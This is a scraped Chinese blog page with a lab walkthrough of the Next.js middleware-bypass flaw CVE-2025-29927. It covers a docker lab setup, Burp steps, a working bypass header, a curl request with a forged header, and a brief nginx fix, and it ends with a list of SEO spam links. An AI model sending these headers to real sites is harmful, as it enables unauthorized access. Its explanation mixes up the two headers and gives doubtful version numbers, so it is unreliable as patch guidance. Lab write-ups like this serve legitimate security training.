当前位置: 首页 > wzjs >正文

wordpress外链音乐seo营销推广全程实例

wordpress外链音乐,seo营销推广全程实例,网站外挂如何做,公司介绍网站平台搭建设计论文前言:CVE-2025-29927 是一个影响 Next.js 的严重漏洞&#xff0c;源于开发者信任了客户端请求中携带的 X-Middleware-Rewrite 头部字段。攻击者可以手动构造该头部&#xff0c;实现绕过中间件逻辑&#xff0c;访问本应受保护的资源或 API。 影响版本&#xff1a;Next.js < …

前言:CVE-2025-29927 是一个影响 Next.js 的严重漏洞,源于开发者信任了客户端请求中携带的 X-Middleware-Rewrite 头部字段。攻击者可以手动构造该头部,实现绕过中间件逻辑,访问本应受保护的资源或 API。

影响版本:Next.js < 14.1.4
成因概括:攻击者利用请求头控制中间件行为,重写跳转目标路径,进而绕过路由拦截。

任务一 启动环境

cd next.js/
cd CVE-2025-29927/
docker compose up -d
//3000就是靶机端口

 

 任务二 打开BurpSuite

代理->代理设置->响应拦截规则(勾选)

随便输入一个弱口令 返回的是/login 没有成功

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
//在bp加入一个头部,返回了200成功了

任务三 拓展 | 本地 

import { NextResponse } from 'next/server';
import type { NextRequest } from 'next/server';export function middleware(request: NextRequest) {const token = request.cookies.get('token');if (!token) {return NextResponse.redirect(new URL('/login', request.url));}return NextResponse.next();
}//创建中间件 middleware.ts
curl -i http://localhost:3000/api/admin \-H "X-Middleware-Rewrite: /api/public" \-H "Cookie: token=malicious"
//构造绕过请求,模拟攻击
//原本未登录用户访问 /api/admin 会被跳转到 /login,构造该头部后,成功伪装访问 /api/public,绕过登录校验。

任务四 修复 

//防御措施
proxy_set_header X-Middleware-Rewrite "";
//中间件中加入请求来源验证机制,防止伪造

官方修复版本:14.1.4
GitHub Release Note 

http://www.dtcms.com/wzjs/332655.html

相关文章:

  • 永久免费搭建网站产品网络营销策划
  • 成都网站建设s1emens优化设计电子版在哪找
  • 东营市东营网站设计地推拉新接单网
  • 郑州高端网站建设团队站长工具seo诊断
  • 宁波正规品牌网站设计网络营销应用方式
  • 工商核名查询网宁波seo整体优化公司
  • 上海人才市场网嘉兴网站建设方案优化
  • 网站seo排名查询比较有名的个人网站
  • jsp商务网站建设2022最近比较火的营销事件
  • axture做网站南京百度seo代理
  • 武汉网络公司武汉做网站公司谷歌推广技巧
  • 网站推广工作内容营销方式有哪些
  • 有什么正网站做兼职的福建seo快速排名优化
  • 长春哪个做网站的公司比较靠谱种子在线资源搜索神器
  • 网站开发报价单明细北京seo优化费用
  • 中国建设网站银行seo搜索引擎优化教程
  • 做网站需要什么配置的电脑怎么去推广一个app
  • wordpress个人淘宝武汉建站优化厂家
  • 淘宝直接怎么做网站信息流广告是什么
  • 中国住房和建设部网站首页欧洲站fba
  • 网站邮箱验证怎么做seo优化技术培训
  • php做公司网站整合营销活动策划方案
  • 成都网站建设公司浅谈企业文化设计
  • 合肥网站设计建设公司佛山seo外包平台
  • 长沙好的网站建设品牌网站优化公司认准乐云seo
  • ftp网站建设网站提交链接入口
  • 专业设计网站软文云
  • 网站工期表怎么做百度2022新版下载
  • 为什么在百度搜不到我的网站人民日报今日新闻
  • wamp环境下做网站网站开发外包